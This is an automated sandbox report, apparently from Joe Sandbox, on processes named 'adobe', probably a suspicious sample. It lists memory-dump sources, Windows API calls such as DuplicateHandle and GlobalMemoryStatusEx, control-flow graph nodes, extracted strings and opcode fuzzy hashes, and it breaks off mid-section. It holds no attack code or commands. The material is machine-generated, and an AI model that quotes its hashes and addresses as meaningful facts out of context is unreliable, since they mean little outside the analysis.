                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0

                                                  Control-flow Graph

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0288D426,?,?,?,?,?), ref: 0288D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0

                                                  Control-flow Graph

                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04F7923D
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2243054395.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_4f70000_adobe.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0288B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0

                                                  Control-flow Graph

                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04F7923D
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2243054395.0000000004F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_4f70000_adobe.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0

                                                  Execution Graph

                                                  Execution Coverage:9.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:19
                                                  Total number of Limit Nodes:4

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 7a9607328d592cbba66aff0028debaf6b92957fa488ace3986d70a3631251c84
                                                  • Instruction ID: ac5503821b0095681da8b951475cf4f144d72c9edea1336c0ad5ee3d8c0adf16
                                                  • Opcode Fuzzy Hash: 7a9607328d592cbba66aff0028debaf6b92957fa488ace3986d70a3631251c84
                                                  • Instruction Fuzzy Hash: A722D231E002199FEF60DFA4C4806AEB7B2EF85320F2585A9D849AB345DB75DD42CB91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1d4b1c00d439d43048a21a7593212d01d83ad42607d614805bbcadd60827eb1
                                                  • Instruction ID: f519c3a6b817b15d154cba3edb6ebddf05413128dc5b75496c8b05ec374fb82f
                                                  • Opcode Fuzzy Hash: b1d4b1c00d439d43048a21a7593212d01d83ad42607d614805bbcadd60827eb1
                                                  • Instruction Fuzzy Hash: 25927A30E002048FDB64DB68C584AADB7F2FB45314F5684A9D859AB362EB75ED42CF80
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1be814ebf0b5fa54ab54645fed2bb3bc23a26844d4ca2e1d6f5cd46e4843ef6
                                                  • Instruction ID: 5f92d91ce4d433e843f6d5d39cb2b9885054be6859fbf221f07358913e42103e
                                                  • Opcode Fuzzy Hash: a1be814ebf0b5fa54ab54645fed2bb3bc23a26844d4ca2e1d6f5cd46e4843ef6
                                                  • Instruction Fuzzy Hash: 5162E134B002048FDB54DB68D584AADB7F2EF84314F6585A9E809EB3A5DB75EC42CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e24506246503c9008a06f222d3d7badeaad245d355b2a3cb699b9aa3f3ea7a1c
                                                  • Instruction ID: 67446048a8e6cb0037861f25c216fc89f451c816f172cc19dd83e3b69f543ff3
                                                  • Opcode Fuzzy Hash: e24506246503c9008a06f222d3d7badeaad245d355b2a3cb699b9aa3f3ea7a1c
                                                  • Instruction Fuzzy Hash: 5B32DF30B002098FDF55DF68D880BAEB7B6EB89310F1185A9E805E7395DB75EC46CB91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 81a4af8f87bf7e7cd4d2aa4aa37486ed36958a926751c390c3a41a48c00a0213
                                                  • Instruction ID: d5f5205ec239112f32be7e0d8dcd3a14e2bf065e98fb2b35b603a6bf2954fd28
                                                  • Opcode Fuzzy Hash: 81a4af8f87bf7e7cd4d2aa4aa37486ed36958a926751c390c3a41a48c00a0213
                                                  • Instruction Fuzzy Hash: B422A330E002098FDF64DF68D4A07BDB7B6EB49710F2188A6E805DB395DA75DC81CBA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: d1e159f7d6bf8628421cff6deed0be3d90346546f54d53a1477b31f70cd2eb03
                                                  • Instruction ID: af24fe2a7240cf22458e332ce838b60a384ed69cd658b8acc9ec90be7231c399
                                                  • Opcode Fuzzy Hash: d1e159f7d6bf8628421cff6deed0be3d90346546f54d53a1477b31f70cd2eb03
                                                  • Instruction Fuzzy Hash: D7E19130E102098FDB68DF68D4906AEB7B6EF85300F218679D809EB395DB75DC46CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: 75484d74c1b7de41988127e0cb725e6888c87deea19eac50e78c94cb2c832660
                                                  • Instruction ID: ced95db8456a5506bbec9074c8e15f4b9d02ff7689072ad2282dd1a3f58740f2
                                                  • Opcode Fuzzy Hash: 75484d74c1b7de41988127e0cb725e6888c87deea19eac50e78c94cb2c832660
                                                  • Instruction Fuzzy Hash: 5A029E30E002098FDFA4DF68D4A06BDB7B2EF45700F2585A6D805EB255DBB5EC45CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 3188e0b9f9037e3ed28062299fe1f864fada6cc0c7860e89e0e3ff1c60958cd0
                                                  • Instruction ID: 99e2dafa3596a39188137a74c150773c3c6740c852438c4624608f06bb25c43e
                                                  • Opcode Fuzzy Hash: 3188e0b9f9037e3ed28062299fe1f864fada6cc0c7860e89e0e3ff1c60958cd0
                                                  • Instruction Fuzzy Hash: CA916F31B0061A9FDB54DF75D850BAEB3F6EF84204F2085A9D90DEB348EA709D468B91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q
                                                  • API String ID: 0-182748909
                                                  • Opcode ID: 9957e59c4ba6084b2e7f6e3059a629308d72b4fdfe4751b647719de33ca32c89
                                                  • Instruction ID: 39a2e19f9d789272a6f1dc990f602db8c38b37c7475475f5bbc78fd15c3131a7
                                                  • Opcode Fuzzy Hash: 9957e59c4ba6084b2e7f6e3059a629308d72b4fdfe4751b647719de33ca32c89
                                                  • Instruction Fuzzy Hash: 0462923060060A8FCB55EF68E580A5EB7F6FF85304F258AA9D4059F369DB75EC46CB80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq$\Obq
                                                  • API String ID: 0-4057264190
                                                  • Opcode ID: 4704bb1678e94c0cb11ca9c968440364228daa2b248ed454353554e520f27917
                                                  • Instruction ID: e7325c590b2647c75bac449ccea0b40ef252d51f67279d01e4364b08a9bbf738
                                                  • Opcode Fuzzy Hash: 4704bb1678e94c0cb11ca9c968440364228daa2b248ed454353554e520f27917
                                                  • Instruction Fuzzy Hash: 8E618230F002099FEB549FA9C8547AEBBF6FF89700F208469E506EB395DB758C418B95

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: 70c1e24ee5ed5abcd5de14aab6d75a68ab077438842630b86952055cb8bc7cae
                                                  • Instruction ID: 01a85a842aed1a194644893000dff9177c3dc2ba626e16bead81d47985e784f1
                                                  • Opcode Fuzzy Hash: 70c1e24ee5ed5abcd5de14aab6d75a68ab077438842630b86952055cb8bc7cae
                                                  • Instruction Fuzzy Hash: 76514E31B00505DFDB54DB78D890BAE73F6EB88604F1085A9D90DDB398EA71DC068B92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq
                                                  • API String ID: 0-2292610095
                                                  • Opcode ID: 062c366c01637271b4bd558bd44ce50d88c63b19919661a36fc61596d58457ec
                                                  • Instruction ID: eff16be97aaa4733280f74e3b40ecef46c56b81b31def376a4b4ad17c3e96e20
                                                  • Opcode Fuzzy Hash: 062c366c01637271b4bd558bd44ce50d88c63b19919661a36fc61596d58457ec
                                                  • Instruction Fuzzy Hash: 74517430F002199FEB54DFA5C854BAEBBF6FF89700F208529E506AB395DA758C418B91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1953 e0ed40-e0ed5b 1954 e0ed85-e0ed9b 1953->1954 1955 e0ed5d-e0ed84 1953->1955 1975 e0ed9d call e0ed40 1954->1975 1976 e0ed9d call e0ee28 1954->1976 1958 e0eda2-e0eda4 1959 e0eda6-e0eda9 1958->1959 1960 e0edaa-e0ee09 1958->1960 1967 e0ee0b-e0ee0e 1960->1967 1968 e0ee0f-e0ee9c GlobalMemoryStatusEx 1960->1968 1971 e0eea5-e0eecd 1968->1971 1972 e0ee9e-e0eea4 1968->1972 1972->1971 1975->1958 1976->1958
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4485716651.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_e00000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fcd8f3fac4b8b0c469b1bf1c4bce24c632e7c0b2df9748b0b3dea57e7dab027
                                                  • Instruction ID: ba7cefe0c19f1710371c995e11798b26b146fdd22c1b72a4bc615ceb7af5a873
                                                  • Opcode Fuzzy Hash: 1fcd8f3fac4b8b0c469b1bf1c4bce24c632e7c0b2df9748b0b3dea57e7dab027
                                                  • Instruction Fuzzy Hash: C6412471E047498FC714DF79D8442EEBBF1EF89310F15866AD408A7291DB789886CBD1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1977 e0ee28-e0ee9c GlobalMemoryStatusEx 1979 e0eea5-e0eecd 1977->1979 1980 e0ee9e-e0eea4 1977->1980 1980->1979
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00E0EE8F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4485716651.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_e00000_adobe.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: a101e664506230791293955a49fe81d54100fcbedbc34f2871252770297944bc
                                                  • Instruction ID: be45ed1b8128d4529d3465bbab88ffd6fbe55769d02b6f56bca8f9b34b4d06ff
                                                  • Opcode Fuzzy Hash: a101e664506230791293955a49fe81d54100fcbedbc34f2871252770297944bc
                                                  • Instruction Fuzzy Hash: EC11EFB1C0065A9BCB10DFAAC544B9EFBF8AF48320F15856AD818B7240D778A944CFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 98891d19d386ffec191c7933df3517966d9a877bef5923d8bb04a9991876bab7
                                                  • Instruction ID: e972cf276e9bcc38063f88ea3c7cf73b987217f8c05f3d2eed0bca4108daf3c7
                                                  • Opcode Fuzzy Hash: 98891d19d386ffec191c7933df3517966d9a877bef5923d8bb04a9991876bab7
                                                  • Instruction Fuzzy Hash: 8841C030E0070ACFDB64DF64D8546AEBBB2FF85300F218569E805E7350EBB49946CB95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 6fe30d9262d5c2233a8aed61190c68a3f62b6421f5518a76f93bfca07dfcd366
                                                  • Instruction ID: f385d1dcf9f1e0660bb8c21dbd120e49604806ef4f1b0cba490199ea1994b83a
                                                  • Opcode Fuzzy Hash: 6fe30d9262d5c2233a8aed61190c68a3f62b6421f5518a76f93bfca07dfcd366
                                                  • Instruction Fuzzy Hash: C031F531B102018FDB499B74D45466E7BA3EF85300F1544A8D406DB396EE75CE06C7A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: d8cb8a44cd29e1dd0b65ce553a18322febe3d2b4e9c72c532ff9736f835a8413
                                                  • Instruction ID: 102a141a5a56506ee9fa9a277c428863a0037730e92025e5645e945e94da90de
                                                  • Opcode Fuzzy Hash: d8cb8a44cd29e1dd0b65ce553a18322febe3d2b4e9c72c532ff9736f835a8413
                                                  • Instruction Fuzzy Hash: DF31C330B102068FDB589B74D514A6E7BE7EF89300F228478D806DB395EE75DE06C7A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Obq
                                                  • API String ID: 0-2878401908
                                                  • Opcode ID: 0b010db63069a197150f17606389cb6e8a558453d297f1af746a6dce848e74a0
                                                  • Instruction ID: 5a4d016587a355b1e1b42a703ee1ab6d46139d7108965d440ec74a44a16ef768
                                                  • Opcode Fuzzy Hash: 0b010db63069a197150f17606389cb6e8a558453d297f1af746a6dce848e74a0
                                                  • Instruction Fuzzy Hash: 4EF0FE71A50129DFDB54DF94E959BAE7BB2FF84705F204119E402A7294CBB41C41CF90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce1433734f3f1dae68b3e5eb9c2af7579fb26b2520f5dc72a3e93bde7dd96cdd
                                                  • Instruction ID: 0fe28665d8cfd4ee3c87964572dc7f1868889f8104b825017750989a387bd915
                                                  • Opcode Fuzzy Hash: ce1433734f3f1dae68b3e5eb9c2af7579fb26b2520f5dc72a3e93bde7dd96cdd
                                                  • Instruction Fuzzy Hash: 9901DF31B101144FEB50DA38E890B6B73D6EB86618F114678F40AC7340E962EC0283D0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49bfdc891882f5e527716cc8e2ae78dd70c9f71728eb36acb6b29dc50d66395a
                                                  • Instruction ID: 86a7a84d01e0d6f9006d04955ffae19adc276901a70ab5b71eaee638cd6a5946
                                                  • Opcode Fuzzy Hash: 49bfdc891882f5e527716cc8e2ae78dd70c9f71728eb36acb6b29dc50d66395a
                                                  • Instruction Fuzzy Hash: D901F733B100281BEB549668DC147FF32EAEBC9310F1241B6D50AE3384EEA6CC0247D2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b14c4e92cfa633bb4a9f3a1e6fbb84a9ec5a9a4f7cb201b11b112b6fd0a57fe6
                                                  • Instruction ID: a9c0d8e53950cc1ea2b5316111960c75654e39716e334d24eae82213b3b3eefc
                                                  • Opcode Fuzzy Hash: b14c4e92cfa633bb4a9f3a1e6fbb84a9ec5a9a4f7cb201b11b112b6fd0a57fe6
                                                  • Instruction Fuzzy Hash: 2D11D3B1D012599FCB00DF9AD884ADEFBB8FB49310F10816AE918A7210D3746954CFA5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 538338d4a85a6274c46a48f34a4c5f2a84641412887ab1adf0b0c35477f7205e
                                                  • Instruction ID: ee9342389f45689aa8080ed2aa84632839c4644eb6bcacf9e10d5144c792f376
                                                  • Opcode Fuzzy Hash: 538338d4a85a6274c46a48f34a4c5f2a84641412887ab1adf0b0c35477f7205e
                                                  • Instruction Fuzzy Hash: 6E01D132B000250BDB64D6AED454B6BB6DBDBCA721F11843AE90EC7388EEA5DC4243D5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c19604921f1eccee5e5dd39c3a80d2a8ab9edceb7ed857a6f9187fbde8fb3df
                                                  • Instruction ID: eb90ce0b63fc544d448dd4c7c99283d89fb325eea8c27e8d0652a3de1578d260
                                                  • Opcode Fuzzy Hash: 4c19604921f1eccee5e5dd39c3a80d2a8ab9edceb7ed857a6f9187fbde8fb3df
                                                  • Instruction Fuzzy Hash: DC01D175F000140BDB65D6ADA854B3F76CACBCA624F11887AF50AC7350DE69DC034BD5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a2b658f5b923aa1f8088e286d1f2a65d38ddbfed07ccdf03ca0d1bdbea15f87
                                                  • Instruction ID: 3ee392fceb7fd76135f8970716b8da5835f2fef8cf2c8066505affb6419b820a
                                                  • Opcode Fuzzy Hash: 5a2b658f5b923aa1f8088e286d1f2a65d38ddbfed07ccdf03ca0d1bdbea15f87
                                                  • Instruction Fuzzy Hash: E801D131B105144FDB50EA38E850B2F77D6EB8A718F118678E50AC7344EEA2EC0283C0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 525216eeeac5cfc2bf5efb55b2b17a322a7f487deddb0ba2ef98b4d3affa8566
                                                  • Instruction ID: 6162cfe03a4090a5f62ed951c8e634cc7fb6320c871f34091dddb0fb34305731
                                                  • Opcode Fuzzy Hash: 525216eeeac5cfc2bf5efb55b2b17a322a7f487deddb0ba2ef98b4d3affa8566
                                                  • Instruction Fuzzy Hash: 57F0A032E212689BDB559A76EC00AABB779E784354F1144AAED01F7244DA72A801CBD0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 98c0091b8d38cc2d137d3a3d9e4dbadae2f39c3c3320ee450c1a699a72546bdb
                                                  • Instruction ID: 6c75f71f1255778c23f0c168230ebf88f31faefad1fbfc7d28956862fe6f32bd
                                                  • Opcode Fuzzy Hash: 98c0091b8d38cc2d137d3a3d9e4dbadae2f39c3c3320ee450c1a699a72546bdb
                                                  • Instruction Fuzzy Hash: EEE0D871E181885BEF60CE70895935A7B78DB02204F2144E9DC08CB102E1B5CF028391
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-2843079600
                                                  • Opcode ID: 65c78b362728bad11f1d81832a3c87ec0e890780be09032caa3ee3af2236a763
                                                  • Instruction ID: bb522a1a8d7d032fa62253914f8ce772febf90ce367ea5be6b81eb4095514d43
                                                  • Opcode Fuzzy Hash: 65c78b362728bad11f1d81832a3c87ec0e890780be09032caa3ee3af2236a763
                                                  • Instruction Fuzzy Hash: EF123E30E002198FDB68DF69C894AADB7F6FF84304F2185A9D809AB355EB719D41CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: 7bddcf3568229e4d72857f50affc0861c926832aaa0492e19f589b029b091605
                                                  • Instruction ID: 3c9091b083b28142679a2d281d74825dc746b43e042c98e30c6146ef78f40cea
                                                  • Opcode Fuzzy Hash: 7bddcf3568229e4d72857f50affc0861c926832aaa0492e19f589b029b091605
                                                  • Instruction Fuzzy Hash: 06915F30A00209DFEB68EF65D994B6E7BF6FF44300F1186B9E801A7295DBB59D41CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-981061697
                                                  • Opcode ID: 8543b0110ad27a74d9ceb4a168d19447bcc9ce43553e4694793d9cbfbd783609
                                                  • Instruction ID: a196b4160433b21611c2698887dc1f509e862ca5670350cd4f8caf262293c1ad
                                                  • Opcode Fuzzy Hash: 8543b0110ad27a74d9ceb4a168d19447bcc9ce43553e4694793d9cbfbd783609
                                                  • Instruction Fuzzy Hash: 23F18330B00209CFDB58EFA5D554A6EB7B6FF84300F2585A9D805AB3A9DB75DC42CB90
                                                  Strings
